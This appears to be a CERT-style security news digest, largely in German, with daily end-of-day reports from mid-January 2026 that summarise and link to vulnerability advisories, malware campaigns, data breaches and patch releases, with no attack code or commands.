Der Netzwerkgerätehersteller TP-Link warnt vor einer gefährlichen Sicherheitslücke in seinen Vigi-Überwachungskameras. [..] Laut Schwachstellenbeschreibung basiert die Lücke auf einem Bug in der Passwortwiederherstellungsfunktion der Webschnittstelle betroffener Kameras. [..] Angreifer können mittels CVE-2026-0629 das Admin-Passwort zurücksetzen, ohne dass eine Überprüfung erfolgt. [..] Angreifer brauchen für die Ausnutzung von CVE-2026-0629 zwar einen Zugriff auf das lokale Netzwerk, mit dem die anvisierte Kamera verbunden ist.

https://www.golem.de/news/tp-link-admin-konten-zahlloser-ueberwachungskameras-knackbar-2601-204385.html

Security updates for Tuesday

Security updates have been issued by AlmaLinux (gpsd-minimal, jmc, kernel, kernel-rt, and net-snmp), Debian (apache-log4j2 and dcmtk), Fedora (exim, gpsd, mysql8.0, mysql8.4, python-biopython, and rust-lru), Mageia (firefox, nss and thunderbird), Oracle (container-tools:rhel8, gpsd-minimal, jmc, kernel, net-snmp, and uek-kernel), Red Hat (net-snmp), SUSE (chromium, go, harfbuzz-devel, kernel, libsoup, rust1.91, rust1.92, and thunderbird), and Ubuntu (apache2, avahi, and python-urllib3).

https://lwn.net/Articles/1055152/

VU#244846: Server-Side Template Injection (SSTI) vulnerability exist in Genshi

A Server-Side Template Injection (SSTI) vulnerability exists in the Genshi template engine due to unsafe evaluation of template expressions. [..] Genshi is a Python library developed by Edgewall, it provides an integrated set of components for parsing, generating, and processing HTML, XML, or other textual content for output generation on the web. [..] If an attacker can influence or inject template expressions, this vulnerability allows arbitrary code execution with the privileges of the running application. [..] At the time of publication, Genshi has not released an update addressing this issue.

https://kb.cert.org/vuls/id/244846

VU#271649: Stack-based buffer overflow in libtasn1 versions v4.20.0 and earlier

https://kb.cert.org/vuls/id/271649

Beckhoff Security Advisory 2025-002

https://download.beckhoff.com/download/document/product-security/Advisories/advisory-2025-002.pdf

Tageszusammenfassung - 19.01.2026

2026-01-19T18:20:51Z

End-of-Day report

Timeframe: Freitag 16-01-2026 18:00 - Montag 19-01-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Guenes Holler

News

StealC hackers hacked as researchers hijack malware control panels

A cross-site scripting (XSS) flaw in the web-based control panel used by operators of the StealC info-stealing malware allowed researchers to observe active sessions and gather intelligence on the attackers- hardware.

https://www.bleepingcomputer.com/news/security/stealc-hackers-hacked-as-researchers-hijack-malware-control-panels/

Autotype: Windows-11-Update macht beliebte Keepass-Funktion kaputt

Seit dem Januar-Patchday kann Keepass in einigen Windows-Dialogen keine Zugangsdaten mehr per Autotype einfügen. Ein Fix ist nicht zu erwarten.

https://www.golem.de/news/autotype-windows-11-update-macht-beliebte-keepass-funktion-kaputt-2601-204337.html

What Happened After Security Researchers Found 60 Flock Cameras Livestreaming to the Internet

A couple months ago, YouTuber Benn Jordan "found vulnerabilities in some of Flock's license plate reader cameras," reports 404 Media's Jason Koebler. "He reached out to me to tell me he had learned that some of Flock's Condor cameras were left live-streaming to the open internet."

https://yro.slashdot.org/story/26/01/17/0718211/what-happened-after-security-researchers-found-60-flock-cameras-livestreaming-to-the-internet?utm_source=rss1.0mainlinkanon&utm_medium=feed

China-Linked APT Exploited Sitecore Zero-Day in Critical Infrastructure Intrusions

A threat actor likely aligned with China has been observed targeting critical infrastructure sectors in North America since at least last year.

https://thehackernews.com/2026/01/china-linked-apt-exploits-sitecore-zero.html

CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures

Cybersecurity researchers have disclosed details of an ongoing campaign dubbed KongTuke that used a malicious Google Chrome extension masquerading as an ad blocker to deliberately crash the web browser and trick victims into running arbitrary commands using ClickFix-like lures to deliver a previously undocumented remote access trojan (RAT) dubbed ModeloRAT.

https://thehackernews.com/2026/01/crashfix-chrome-extension-delivers.html

Fehlende Postleitzahl? Nachricht von DPD ist eine Phishing-Falle

Ein Klassiker des Online-Betrugs. Ein Paketdienstleister meldet sich aus heiterem Himmel. Angeblich war ein Zustellversuch aufgrund einer fehlenden Postleitzahl nicht erfolgreich. Tatsächlich versuchen Kriminelle über ein gefälschtes Portal an Kreditkartendaten zu kommen.

https://www.watchlist-internet.at/news/dpd-phishing-falle/

Windows Januar 2026 Update tauscht Secure Boot Zertifikate

Im Juni 2026 laufen UEFI Secure Boot-Zertifikate für Windows ab. Im Oktober 2026 trifft es dann das nächste ablaufende UEFI-Zertifikat für den Secure Boot. Microsoft hat zum 13. Januar 2026 im Rahmen des Patchday erneut den Ansatz unternommen, das Secure Boot-Zertifikat im UEFI auszutauschen. Hier eine kurze Nachlese zum Sachstand.

https://borncity.com/blog/2026/01/17/windows-januar-2026-update-tauscht-secure-boot-zertifikate/

From Extension to Infection: An In-Depth Analysis of the Evelyn Stealer Campaign Targeting Software Developers

This blog entry provides an in-depth analysis of the multistage delivery of the Evelyn information stealer, which was used in a campaign targeting software developers.

https://www.trendmicro.com/en_us/research/26/a/analysis-of-the-evelyn-stealer-campaign.html

Hackers Exploiting PDF24 App to Deploy Stealthy PDFSIDER Backdoor

Resecurity has identified PDFSIDER malware that exploits the legitimate PDF24 App to covertly steal data and allow remote access. Learn how this APT-level campaign targets corporate networks through spear-phishing and encrypted communications.

https://hackread.com/hackers-exploit-pdf24-app-pdfsider-backdoor/

Blink and youll miss them: 6-day certificates are here!

What a great way to start 2026! Let's Encrypt have now made their short-lived certificates available, so you can go and start using them right away.

https://scotthelme.ghost.io/blink-and-youll-miss-them-6-day-certificates-are-here/

Microsoft startet mit Identifizierung von unsicherer RC4-Verschlüsselung

Die Windows-Sicherheitsupdates aus dem Januar läuten den Rauswurf unsicherer RC4-Verschlüsselung ein. Eine Lücke erfordert Maßnahmen.

https://heise.de/-11145332

Malware Peddlers Are Now Hijacking Snap Publisher Domains

tl;dr: There-s a relentless campaign by scammers to publish malware in the Canonical Snap Store. Some gets caught by automated filters, but plenty slips through. Recently, these miscreants have changed tactics - they-re now registering expired domains belonging to legitimate snap publishers, taking over their accounts, and pushing malicious updates to previously trustworthy applications. This is a significant escalation.

https://blog.popey.com/2026/01/malware-purveyors-taking-over-published-snap-email-domains/

TPM on Embedded Systems: Pitfalls and Caveats

Trusted Platform Module (TPM) chips have been around since the release of the TPM 1.2 specification more than 20 years ago, and the TPM 2.0 specification1 was released in 2014. The technology is now seeing widespread adoption in various computing sectors. TPMs have been a standard feature in PCs, particularly notebooks, for some time. With integration into tools like systemd-s tooling for LUKS/dm-crypt and legal requirements like EU-s CRA, TPM functionality is also now making its way into the embedded Linux sector. In this post, we-ll highlight common pitfalls and considerations for using TPM chips on embedded devices.

https://sigma-star.at/blog/2026/01/tpm-on-embedded-systems-pitfalls-and-caveats/

How to Remove Saved Passwords From Google Chrome (And Why You Should)

It usually starts with a small convenience. You log into a site once, Chrome offers to remember the password, and you click -Save- without thinking twice. Weeks turn into months, devices multiply, and before you know it, your browser knows more about your digital life than you do. This is exactly how many users end up relying on Chrome-s built-in tools without ever learning how to delete passwords from Chrome when it actually matters.

https://thecyberexpress.com/how-to-delete-saved-passwords-in-google-chrome/

All In One SEO Plugin Flaw Exposes AI Token to Low-Privilege WordPress Users

A newly disclosed security vulnerability in the All In One SEO ecosystem has drawn attention across the WordPress community due to its potential reach and impact. The flaw affects the widely used AIOSEO plugin, which is active on more than 3 million WordPress websites. It allows low-privileged users to access a site-wide AI access token tied to the plugin-s artificial intelligence features.

https://thecyberexpress.com/all-in-one-seo-wordpress-ai-token/

Vulnerabilities

Security updates for Monday

Security updates have been issued by AlmaLinux (cups, libpq, libsoup3, podman, and postgresql16), Debian (ffmpeg, gpsd, python-urllib3, and thunderbird), Fedora (chromium, foomuuri, forgejo, freerdp, harfbuzz, libtpms, musescore, python-biopython, and python3.12), Mageia (gimp, libpng, nodejs, and python-urllib3), and SUSE (alloy, avahi, bind, chromedriver, chromium, cpp-httplib, docker, erlang, fluidsynth, freerdp, go-sendxmpp, govulncheck-vulndb, kernel, libwireshark19, NetworkManager-applet-l2tp, python, python311-virtualenv, thunderbird, and zk).

https://lwn.net/Articles/1054992/

Unberechtigte Zugriffe möglich: Lücken in Dells OneFS-NAS-Betriebssystem

Dells NAS-Betriebssystem PowerScale OneFS ist über mehrere Sicherheitslücken angreifbar. Dagegen stehen abgesicherte Ausgaben zum Download bereit.

https://heise.de/-11145497

Wireshark 4.6.3 Released, (Sat, Jan 17th)

https://isc.sans.edu/diary/rss/32636

K000159600: Rack vulnerability CVE-2022-30123

https://my.f5.com/manage/s/article/K000159600

K000159077: GNU Tar vulnerability CVE-2019-9923

https://my.f5.com/manage/s/article/K000159077

Tageszusammenfassung - 16.01.2026

2026-01-16T18:29:42Z

End-of-Day report

Timeframe: Donnerstag 15-01-2026 18:00 - Freitag 16-01-2026 18:00 Handler: Alexander Riepl Co-Handler: Felician Fuchs

News

Per Bitflip zum Root-Zugriff: Lücke in AMD-CPUs ermöglicht Einbruch in Cloud-VMs

Eine neue Angriffstechnik namens Stackwarp lässt Angreifer über AMD-CPUs virtuelle Maschinen kapern. Vor allem Cloud-Umgebungen sind gefährdet.

https://www.golem.de/news/per-bitflip-zum-root-zugriff-luecke-in-amd-cpus-ermoeglicht-einbruch-in-cloud-vms-2601-204279.html

AWS CodeBuild Misconfiguration Exposed GitHub Repos to Potential Supply Chain Attacks

A critical misconfiguration in Amazon Web Services (AWS) CodeBuild could have allowed complete takeover of the cloud service providers own GitHub repositories, including its AWS JavaScript SDK, putting every AWS environment at risk.

https://thehackernews.com/2026/01/aws-codebuild-misconfiguration-exposed.html

Five Malicious Chrome Extensions Impersonate Workday and NetSuite to Hijack Accounts

Cybersecurity researchers have discovered five new malicious Google Chrome web browser extensions that masquerade as human resources (HR) and enterprise resource planning (ERP) platforms like Workday, NetSuite, and SuccessFactors to take control of victim accounts.

https://thehackernews.com/2026/01/five-malicious-chrome-extensions.html

Chinese spies used Maduros capture as a lure to phish US govt agencies

Whats next for Venezuela? Click on the file and see What policy wonk wouldnt want to click on an attachment promising to unveil US plans for Venezuela? Chinese cyberspies used just such a lure to target US government agencies and policy-related organizations in a phishing campaign that began just days after an American military operation captured Venezuelan President Nicolás Maduro.

https://go.theregister.com/feed/www.theregister.com/2026/01/15/chinese_spies_used_maduros_capture/

Bankrupt scooter startup left one private key to rule them all

An Estonian e-scooter owner locked out of his own ride after the manufacturer went bust did what any determined engineer might do. He reverse-engineered it, and claims he ended up discovering the master key that unlocks every scooter the company ever sold.

https://www.theregister.com/2026/01/16/bankrupt_scooter_startup_key/

RondoDox botnet linked to large-scale exploit of critical HPE OneView bug

Check Point observes 40K+ attack attempts in our hours, with government organizations under fire A critical HPE OneView flaw is now being exploited at scale, with Check Point tying mass, automated attacks to the RondoDox botnet.

https://www.theregister.com/2026/01/16/rondodox_botnet_hpe_oneview/

German cops add Black Basta boss to EU most-wanted list

Ransomware kingpin who escaped Armenian custody is believed to be lying low back home German cops have added Russian national Oleg Evgenievich Nefekov to their list of most-wanted criminals for his services to ransomware.

https://www.theregister.com/2026/01/16/black_basta_boss_wanted/

Jetzt patchen! Kritische Cisco-Lücke seit Dezember 2025 ausgenutzt

Angreifer kompromittieren Cisco Secure Email Gateway und Secure Email und Web Manager über eine Root-Schwachstelle. Nun gibt es Sicherheitsupdates.

https://www.heise.de/news/Jetzt-patchen-Kritische-Cisco-Luecke-seit-Dezember-2025-ausgenutzt-11143359.html

Die lernende Bedrohung: Predator-Spyware ist raffinierter als gedacht

Die Spähsoftware Predator von Intellexa gewinnt selbst aus gescheiterten Infektionsversuchen wertvolle Daten und macht gezielt Jagd auf IT-Sicherheitsforscher.

https://www.heise.de/news/Die-lernende-Bedrohung-Predator-Spyware-ist-raffinierter-als-gedacht-11144402.html

Chinese hackers targeting -high value- North American critical infrastructure, Cisco says

Chinese hackers successfully breached multiple critical infrastructure organizations in North America over the last year using a combination of compromised credentials and exploitable servers, researchers at Cisco Talos found.

https://therecord.media/china-hackers-apt-cisco-talos

Canadian investment regulator confirms hackers hit 750,000 investors

The nongovernmental Canadian Investment Regulatory Organization, which oversees the countrys debt and equity marketplaces as well as some financial institutions, released details about an August 2025 data breach.

https://therecord.media/canada-ciro-investing-regulator-confirms-data-breach

CVE-2025-55182: React2Shell Analysis, Proof-of-Concept Chaos, and In-the-Wild Exploitation

CVE-2025-55182 is a CVSS 10.0 pre-authentication RCE affecting React Server Components. Amid the flood of fake proof-of-concept exploits, scanners, exploits, and widespread misconceptions, this technical analysis intends to cut through the noise.

https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html

New PayPal Scam Sends Verified Invoices With Fake Support Numbers

Scammers are using verified PayPal invoices to launch callback phishing attacks. Learn how the "Alexzander" invoice bypasses Google filters.

https://hackread.com/paypal-scam-verified-invoices-fake-support-numbers/

Operation Endgame: Dutch Police Arrest Alleged AVCheck Operator

Dutch police arrest the alleged AVCheck operator at Schiphol as part of Operation Endgame, a global effort targeting malware services and cybercrime.

https://hackread.com/operation-endgame-dutch-police-arrest-avcheck-operator/

Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation

Mandiant is publicly releasing a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 being deprecated and known to be insecure for over two decades-with cryptanalysis dating back to 1999-Mandiant consultants continue to identify its use in active environments.

https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables/

Das Meldeportal in der AWS-Cloud: Warum nur, BSI?

Schön, dass das BSI ein neues Portal für IT-Sicherheit bietet. Aber muss das unbedingt über die AWS-Cloud laufen, fragt sich Tobias Glemser.

https://heise.de/-11142071

How to Use Pareto Principle to Fine-Tune Alerts and Reduce False Positives Wisely

False positives were not only consuming analyst time - they were also diluting attention and slowing response on the few alerts that actually mattered.

https://detect.fyi/how-to-use-pareto-principle-to-fine-tune-alerts-and-reduce-false-positives-wisely-2c171356fe5b

Vulnerabilities

Hackers exploit Modular DS WordPress plugin flaw for admin access

Hackers are actively exploiting a maximum severity flaw in the Modular DS WordPress plugin that allows them to bypass authentication remotely and access the vulnerable sites with admin-level privileges.

https://www.bleepingcomputer.com/news/security/hackers-exploit-modular-ds-wordpress-plugin-flaw-for-admin-access/

Critical flaw lets hackers track, eavesdrop via Bluetooth audio devices

A critical vulnerability in Googles Fast Pair protocol can allow attackers to hijack Bluetooth audio accessories like wireless headphones and earbuds, track users, and eavesdrop on their conversations.

https://www.bleepingcomputer.com/news/security/critical-whisperpair-flaw-lets-hackers-track-eavesdrop-via-bluetooth-audio-devices/

VU#383552: thelibrarian does not secure its interface, allowing for access to internal system data

Multiple vulnerabilities were discovered in The Librarian, an AI-powered personal assistant tool provided by the company TheLibrarian.io. The Librarian can be used to manage personal email, calendar, documents, and other information through external services, such as Gmail and Google Drive, and also summarize meetings and schedule emails.

https://kb.cert.org/vuls/id/383552

VU#650657: Livewire Filemanager contains an insecure .php component that allows for unauthenticated RCE in Laravel Products

A vulnerability, tracked as CVE-2025-14894, has been discovered within Livewire Filemanager, a tool designed for usage within Laravel applications. The Livewire Filemanager tool allows for users to upload various files, including PHP files, and host them within the Laravel application.

https://kb.cert.org/vuls/id/650657

Juniper Networks: Zahlreiche Sicherheitsupdates für diverse Produkte

Juniper Networks hat Sicherheitsaktualisierungen für zahlreiche Produkte veröffentlicht. IT-Admins sollten sie rasch anwenden.

https://www.heise.de/news/Juniper-Networks-Zahlreiche-Sicherheitsupdates-fuer-diverse-Produkte-11143432.html

Security updates for Friday

Security updates have been issued by AlmaLinux (gnupg2), Debian (firefox-esr), Oracle (cups, gnupg2, libpq, net-snmp, postgresql, postgresql:15, postgresql:16, transfig, and vsftpd), Red Hat (firefox), SUSE (apache2, curl, firefox, gpg2, hawk2, libcryptopp-devel, openCryptoki, python310, python311-urllib3, rke2, squid, and tomcat), and Ubuntu (cpp-httplib, git, python-apt, and simgear).

https://lwn.net/Articles/1054683/

Tageszusammenfassung - 15.01.2026

2026-01-15T18:36:27Z

End-of-Day report

Timeframe: Mittwoch 14-01-2026 18:00 - Donnerstag 15-01-2026 18:00 Handler: Alexander Riepl Co-Handler: Felician Fuchs

News

Exploit code public for critical FortiSIEM command injection flaw

Technical details and a public exploit have been published for a critical vulnerability affecting Fortinets Security Information and Event Management (SIEM) solution that could be leveraged by a remote, unauthenticated attacker to execute commands or code.

https://www.bleepingcomputer.com/news/security/exploit-code-public-for-critical-fortisiem-command-injection-flaw/

Critical flaw lets hackers track, eavesdrop via Bluetooth audio devices

https://www.bleepingcomputer.com/news/security/critical-flaw-lets-hackers-track-eavesdrop-via-bluetooth-audio-devices/

Most Severe AI Vulnerability to Date Hits ServiceNow

The ITSM giant tacked agentic AI onto a largely unguarded legacy chatbot, exposing customers data and connected systems.

https://www.darkreading.com/remote-workforce/ai-vulnerability-servicenow

Januar-Patchday: Windows-Updates machen Remote-Anmeldung kaputt

Einige Anwender haben neuerdings Probleme, sich mit der Windows-App bei Azure Virtual Desktop oder Windows 365 anzumelden. Ein Fix ist in Arbeit.

https://www.golem.de/news/januar-patchday-windows-updates-machen-windows-app-kaputt-2601-204213.html

Ransomware-Boss gesucht: Dieser Mann soll der Anführer von Black Basta sein

Interpol, Europol und das BKA fahnden nach dem Boss der Ransomware-Gruppe Black Basta, die allein in Deutschland über 100 Organisationen geschädigt hat.

https://www.golem.de/news/ransomware-boss-gesucht-dieser-mann-soll-der-anfuehrer-von-black-basta-sein-2601-204218.html

A 0-click exploit chain for the Pixel 9 Part 1: Decoding Dolby

Over the past few years, several AI-powered features have been added to mobile phones that allow users to better search and understand their messages. One effect of this change is increased 0-click attack surface, as efficient analysis often requires message media to be decoded before the message is opened by the user. One such feature is audio transcription.

https://projectzero.google/2026/01/pixel-0-click-part-1.html

A 0-click exploit chain for the Pixel 9 Part 2: Cracking the Sandbox with a Big Wave

With the advent of a potential Dolby Unified Decoder RCE exploit, it seemed prudent to see what kind of Linux kernel drivers might be accessible from the resulting userland context, the mediacodec context.

https://projectzero.google/2026/01/pixel-0-click-part-2.html

A 0-click exploit chain for the Pixel 9 Part 3: Where do we go from here?

While our previous two blog posts provided technical recommendations for increasing the effort required by attackers to develop 0-click exploit chains, our experience finding, reporting and exploiting these vulnerabilities highlighted some broader issues in the Android ecosystem. This post describes the problems we encountered and recommendations for improvement.

https://projectzero.google/2026/01/pixel-0-click-part-3.html

Researchers Null-Route Over 550 Kimwolf and Aisuru Botnet Command Servers

The Black Lotus Labs team at Lumen Technologies said it null-routed traffic to more than 550 command-and-control (C2) nodes associated with the AISURU/Kimwolf botnet since early October 2025.

https://thehackernews.com/2026/01/kimwolf-botnet-infected-over-2-million.html

Verizon Outage Knocks Out US Mobile Service, Including Some 911 Calls

A major Verizon outage appeared to impact customers across the United States starting around noon ET on Wednesday. Calls to Verizon customers from other carriers may also be impacted.

https://www.wired.com/story/verizon-outage-knocks-out-us-mobile-service-including-some-911-calls/

Razzia in Deutschland: Behörden machen Cybercrime-Hoster RedVDS dicht

Internationalen Ermittlern und Microsoft ist ein Schlag gegen die Infrastruktur des Cybercrime-Hosters RedVDS gelungen. Die Server standen auch in Deutschland.

https://www.heise.de/news/Razzia-in-Deutschland-Behoerden-machen-Cybercrime-Hoster-RedVDS-dicht-11141431.html

Chrome: Google kappt Support für älteres macOS

Das vor weniger als fünf Jahren erschienene macOS 12 alias Monterey ist bei Googles Browser bald raus. Sicherheitslücken bleiben bestehen.

https://www.heise.de/news/Chrome-Google-kappt-Support-fuer-aelteres-macOS-11140713.html

curl: Projekt beendet Bug-Bounty-Programm

curl-Maintainer Daniel Stenberg hat das Ende des Bug-Bounty-Programms angekündigt. Unbrauchbare KI-Meldungen nahmen wohl überhand.

https://www.heise.de/news/curl-Projekt-beendet-Bug-Bounty-Programm-11142345.html

Kriminelle imitieren Banknummern: Vorsicht vor Spoofing

Kriminelle suchen ständig nach neuen Methoden, um an Kontodaten zu gelangen. Leider sind sie fündig geworden: Mit Spoofing täuschen sie die Nummer von Banken vor und erschleichen so das Vertrauen ihrer Opfer.

https://www.watchlist-internet.at/news/kriminelle-imitieren-banknummern-spoofing/

Microsoft disrupts RedVDS cybercrime platform behind $40 million in scam losses

Microsoft and law enforcement partners took down a popular cybercriminal subscription service called RedVDS that was used to enable more than $40 million in fraud losses in the United States alone.

https://therecord.media/microsoft-redvds-cybercrime-scam

UAT-8837 targets critical infrastructure sectors in North America

Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor.

https://blog.talosintelligence.com/uat-8837/

GhostPoster Browser Malware Hid for 5 Years With 840,000 Installs

Researchers uncover a 5-year malware campaign using browser extensions on Chrome, Firefox and Edge, relying on hidden payloads and shared infrastructure.

https://hackread.com/ghostposter-browser-malware-840000-installs/

Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation

https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables/

New Remcos Campaign Distributed Through Fake Shipping Document

FortiGuard Labs discovered a new phishing campaign in the wild. The campaign delivers a new variant of Remcos, a commercial lightweight remote access tool (RAT) with a wide range of capabilities, including system resource management, remote surveillance, network management, and Remcos agent management.

https://feeds.fortinet.com/~/940295429/0/fortinet/blogs~New-Remcos-Campaign-Distributed-Through-Fake-Shipping-Document

I-m The Captain Now: Hijacking a global ocean supply chain network

There-s a good chance you have never heard of BLUVOYIX or Bluspark Global, and that-s ok! Not every company that powers global commerce is a household name. Despite their low profile, companies like these have an important role to play in keeping the global supply chain running in the background. Breaches at companies you haven-t heard of can often have the worst impacts.

https://eaton-works.com/2026/01/14/bluspark-bluvoyix-hack/

Malicious Chrome Extension Steals MEXC API Keys for Account Takeover

A malicious Chrome extension steals newly created MEXC API keys, exfiltrates them to Telegram, and enables full account takeover with trading and withdrawal rights.

https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys

Vulnerabilities

Critical WordPress Modular DS Plugin Flaw Actively Exploited to Gain Admin Access

A maximum-severity security flaw in a WordPress plugin called Modular DS has come under active exploitation in the wild, according to Patchstack. The vulnerability, tracked as CVE-2026-23550 (CVSS score: 10.0), has been described as a case of unauthenticated privilege escalation impacting all versions of the plugin prior to and including 2.5.1. It has been patched in version 2.5.2.

https://thehackernews.com/2026/01/critical-wordpress-modular-ds-plugin.html

Role Delegation - Moderately critical - Access bypass - SA-CONTRIB-2026-002

This module allows site administrators to grant specific roles the authority to assign selected roles to users, without them needing the "administer permissions" permission. The module contains an access bypass vulnerability when used in combination with the Views Bulk Operations module. A user with the ability to delegate a role is also able to assign the administrator role, including to their own user.

https://www.drupal.org/sa-contrib-2026-002

Group invite - Moderately critical - Access bypass - SA-CONTRIB-2026-001

This module enables allows group managers to invite people into their group. The module doesn't sufficiently check access under certain circumstances, allowing unauthorized users to access the group's content.

https://www.drupal.org/sa-contrib-2026-001

Microsoft Entra ID SSO Login - Critical - Access bypass - SA-CONTRIB-2026-005

This module enables Drupal sites to authenticate users via Microsoft Entra ID (formerly Azure AD) using OAuth 2.0. The module doesn't sufficiently validate API responses from Microsoft allowing complete account takeover of any user, including site administrators, without requiring any credentials or access to the target's email account.

https://www.drupal.org/sa-contrib-2026-005

Fortinet: Heap-based buffer overflow in cw_acd daemon (FortiOS, FortiSASE, FortiSwitchManager)

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS and FortiSwitchManager cw_acd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. CVE-2025-25249 / CVSSv3 Score 7.4

https://fortiguard.fortinet.com/psirt/FG-IR-25-084

Angreifer können Palo-Alto-Firewalls in Wartungsmodus zwingen

Unter bestimmten Bedingungen können Angreifer an einer Sicherheitslücke in PAN-OS ansetzen und so Firewalls von Palo Alto Networks attackieren. Bislang gibt es dem IT-Sicherheitsunternehmen zufolge keine Hinweise auf Attacken.

https://www.heise.de/news/Angreifer-koennen-Palo-Alto-Firewalls-in-Wartungsmodus-zwingen-11142149.html

CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal (Severity: HIGH)

A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Repeated attempts to trigger this issue results in the firewall entering into maintenance mode.

https://security.paloaltonetworks.com/CVE-2026-0227

Security Vulnerabilities fixed in Thunderbird 140.7

https://www.mozilla.org/en-US/security/advisories/mfsa2026-05/

Security Vulnerabilities fixed in Thunderbird 147

https://www.mozilla.org/en-US/security/advisories/mfsa2026-04/

Tageszusammenfassung - 14.01.2026

2026-01-14T18:52:57Z

End-of-Day report

Timeframe: Dienstag 13-01-2026 18:00 - Mittwoch 14-01-2026 18:30 Handler: Felician Fuchs Co-Handler: n/a

News

Target employees confirm leaked source code is authentic

Multiple current and former Target employees confirmed that leaked source code samples posted by a threat actor match real internal systems. The company also rolled out an "accelerated" lockdown of its Git server, requiring VPN access, a day after being contacted by BleepingComputer.

https://www.bleepingcomputer.com/news/security/target-employees-confirm-leaked-source-code-is-authentic/

Microsoft: Windows 365 update blocks access to Cloud PC sessions

Microsoft confirmed that a recent Windows 365 update is blocking customers from accessing their Microsoft 365 Cloud PC sessions.

https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-365-update-blocks-access-to-cloud-pc-sessions/

Cloud marketplace Pax8 accidentally exposes data on 1,800 MSP partners

Cloud marketplace and distributor Pax8 has confirmed that it mistakenly sent an email to fewer than 40 UK-based partners containing a spreadsheet with internal business information, including MSP customer and Microsoft licensing data.

https://www.bleepingcomputer.com/news/security/cloud-marketplace-pax8-accidentally-exposes-data-on-1-800-msp-partners/

Reprompt attack let hackers hijack Microsoft Copilot sessions

Researchers identified an attack method dubbed "Reprompt" that could allow attackers to infiltrate a users Microsoft Copilot session and issue commands to exfiltrate sensitive data.

https://www.bleepingcomputer.com/news/security/reprompt-attack-let-hackers-hijack-microsoft-copilot-sessions/

ConsentFix debrief: Insights from the new OAuth phishing attack

ConsentFix is an OAuth phishing technique abusing browser-based authorization flows to hijack Microsoft accounts. Push Security shares new insights from continued tracking, community research, and evolving attacker techniques.

https://www.bleepingcomputer.com/news/security/consentfix-debrief-insights-from-the-new-oauth-phishing-attack/

Microsoft updates Windows DLL that triggered security alerts

Microsoft has resolved a known issue that was causing security applications to incorrectly flag a core Windows component, the company said in a service alert posted this week.

https://www.bleepingcomputer.com/news/microsoft/microsoft-updates-windows-dll-that-triggered-security-alerts/

Ohne Authentifizierung: Broadcom-Lücke lässt Angreifer ganze WLAN-Netze lahmlegen

Zahlreiche WLAN-Netze, die auf Broadcom-Chipsätzen basieren, lassen sich mit nur einem Datenpaket lahmlegen. Angreifer brauchen dafür keinen Schlüssel.

https://www.golem.de/news/ohne-authentifizierung-broadcom-luecke-laesst-angreifer-ganze-wlan-netze-lahmlegen-2601-204166.html

Corrupting LLMs Through Weird Generalizations

Abstract LLMs are useful because they generalize so well. But can you have too much of a good thing? We show that a small amount of finetuning in narrow contexts can dramatically shift behavior outside those contexts.

https://www.schneier.com/blog/archives/2026/01/corrupting-llms-through-weird-generalizations.html

Malware Intercepts Googlebot via IP-Verified Conditional Logic

Some attackers are increasingly moving away from simple redirects in favor of more -selective- methods of payload delivery. This approach filters out regular human visitors, allowing attackers to serve malicious content to search engine crawlers while remaining invisible to the website owner.

https://blog.sucuri.net/2026/01/malware-intercepts-googlebot-via-ip-verified-conditional-logic.html

Malicious Chrome Extension Steals MEXC API Keys by Masquerading as Trading Tool

Cybersecurity researchers have disclosed details of a malicious Google Chrome extension thats capable of stealing API keys associated with MEXC, a centralized cryptocurrency exchange (CEX) available in over 170 countries, while masquerading as a tool to automate trading on the platform.

https://thehackernews.com/2026/01/malicious-chrome-extension-steals-mexc.html

New Research: 64% of 3rd-Party Applications Access Sensitive Data Without Justification

Research analyzing 4,700 leading websites reveals that 64% of third-party applications now access sensitive data without business justification, up from 51% in 2024. Government sector malicious activity spiked from 2% to 12.9%, while 1 in 7 Education sites show active compromise.

https://thehackernews.com/2026/01/new-research-64-of-3rd-party.html

Hackers Exploit c-ares DLL Side-Loading to Bypass Security and Deploy Malware

Security experts have disclosed details of an active malware campaign thats exploiting a DLL side-loading vulnerability in a legitimate binary associated with the open-source c-ares library to bypass security controls and deliver a wide range of commodity trojans and stealers.

https://thehackernews.com/2026/01/hackers-exploit-c-ares-dll-side-loading.html

Interrail meldet Datenleck: Auch Ausweisdaten betroffen

Bei Eurail flossen mutmaßlich Daten ab. Der Anbieter stellt Interrail-Pässe auch im Auftrag der deutschen, österreichischen und Schweizer Bahn aus.

https://www.heise.de/news/Interrail-meldet-Datenleck-Auch-Ausweisdaten-betroffen-11140218.html

Kritik an GnuPG und seinem Umgang mit gemeldeten Lücken

Die auf dem 39C3 demonstrierten Probleme in der PGP-Implementierung GnuPG riefen vielfältige Kritik an GnuPGs Umgang damit, aber auch an PGP insgesamt hervor.

https://www.heise.de/hintergrund/Kritik-an-GnuPG-und-seinem-Umgang-mit-gemeldeten-Luecken-11132888.html

Malware-Masche: Jobangebote jubeln Entwicklern bösartige Repositories unter

Entwickler müssen bei Jobangeboten inzwischen aufpassen. Kriminelle versuchen, Infostealer darüber zu verteilen.

https://www.heise.de/news/Malware-Masche-Jobangebote-jubeln-Entwicklern-boesartige-Repositories-unter-11140776.html

How real software downloads can hide remote backdoors

Attackers use legitimate open-source software as cover, relying on user trust to compromise systems. We dive into an example.

https://www.malwarebytes.com/blog/threat-intel/2026/01/how-real-software-downloads-can-hide-remote-backdoors

Instagram dementiert Hack nach massenhaften Passwort-Reset-Mails

Zuvor waren Berichte über entwendete Daten von 17 Millionen Usern kursiert. Das Unternehmen widerspricht und rät zum Ignorieren der Mails

